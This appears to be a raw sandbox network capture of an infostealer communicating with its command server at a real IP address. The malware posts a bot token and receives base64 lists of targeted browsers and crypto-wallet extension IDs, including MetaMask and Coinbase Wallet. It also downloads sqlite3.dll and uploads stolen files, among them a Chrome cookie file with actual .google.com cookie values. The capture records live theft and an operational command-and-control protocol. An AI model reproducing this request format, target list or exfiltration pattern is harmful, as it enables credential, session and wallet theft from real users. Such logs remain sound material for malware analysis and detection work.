                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                Jul 3, 2024 08:38:09.689702988 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                Jul 3, 2024 08:38:09.691399097 CEST464OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA
                                                                Host: 85.28.47.4
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 2d 2d 0d 0a
                                                                Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="message"plugins------CAAAAFBKFIECAAKECGCA--
                                                                Jul 3, 2024 08:38:09.867325068 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 5416
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                Jul 3, 2024 08:38:09.867345095 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                Jul 3, 2024 08:38:09.867356062 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                Jul 3, 2024 08:38:09.867482901 CEST672INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                Jul 3, 2024 08:38:09.873893976 CEST1236INData Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32
                                                                Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
                                                                Jul 3, 2024 08:38:09.873908043 CEST28INData Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 77 3d
                                                                Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHw=
                                                                Jul 3, 2024 08:38:09.875366926 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB
                                                                Host: 85.28.47.4
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 2d 2d 0d 0a
                                                                Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="message"fplugins------JJEGCBGIDHCAKEBGIIDB--
                                                                Jul 3, 2024 08:38:10.052095890 CEST335INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                Jul 3, 2024 08:38:10.073419094 CEST198OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF
                                                                Host: 85.28.47.4
                                                                Content-Length: 6675
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:10.073482037 CEST6675OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66
                                                                Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                Jul 3, 2024 08:38:10.857768059 CEST202INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:10 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 3, 2024 08:38:11.081896067 CEST89OUTGET /69934896f997d5bb/sqlite3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:11.256635904 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:11 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                ETag: "10e436-5e7eeebed8d80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1106998
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                Jul 3, 2024 08:38:11.256654024 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                Data Ascii: #N@B/81s:<R@B/92P @B
                                                                Jul 3, 2024 08:38:11.256664038 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                Jul 3, 2024 08:38:11.256714106 CEST672INData Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31
                                                                Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
                                                                Jul 3, 2024 08:38:12.394356966 CEST948OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
                                                                Host: 85.28.47.4
                                                                Content-Length: 751
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------AAEGHJKJKKJDHIDHJKJD--
                                                                Jul 3, 2024 08:38:13.084861994 CEST202INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:12 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 3, 2024 08:38:13.162439108 CEST556OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBA
                                                                Host: 85.28.47.4
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b [TRUNCATED]
                                                                Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file"------IJKJJKFHIJKKFHJJECBA--
                                                                Jul 3, 2024 08:38:13.862174034 CEST202INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:13 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=93
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 3, 2024 08:38:14.775974035 CEST556OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECA
                                                                Host: 85.28.47.4
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
